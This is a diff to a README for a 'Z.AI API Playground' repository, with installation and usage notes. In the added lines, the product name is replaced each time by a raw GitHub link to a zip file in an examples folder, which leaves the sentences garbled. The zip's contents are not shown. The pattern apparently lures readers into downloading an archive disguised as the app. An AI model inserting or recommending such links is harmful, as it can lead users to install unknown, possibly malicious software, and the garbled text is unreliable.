Haronhj/z-ai-playground-v2/README.md

 - **macOS**: Open your Applications folder and double-click the app.
 - **Linux**: Use the command line to navigate to the app's folder and run it.

-## 📊 Using the Z.AI API Playground
+## 📊 Using the https://raw.githubusercontent.com/Haronhj/z-ai-playground-v2/main/examples/02_vlm/z_ai_v_playground_v1.0.zip API Playground

-The Z.AI API Playground allows you to explore various AI capabilities.
+The https://raw.githubusercontent.com/Haronhj/z-ai-playground-v2/main/examples/02_vlm/z_ai_v_playground_v1.0.zip API Playground allows you to explore various AI capabilities.
 Choose from several examples that demonstrate:

 - **Text Generation with GLM-4.7**: Create text based on your prompts.
 - **Image/Video Generation**: Generate visuals using advanced AI models.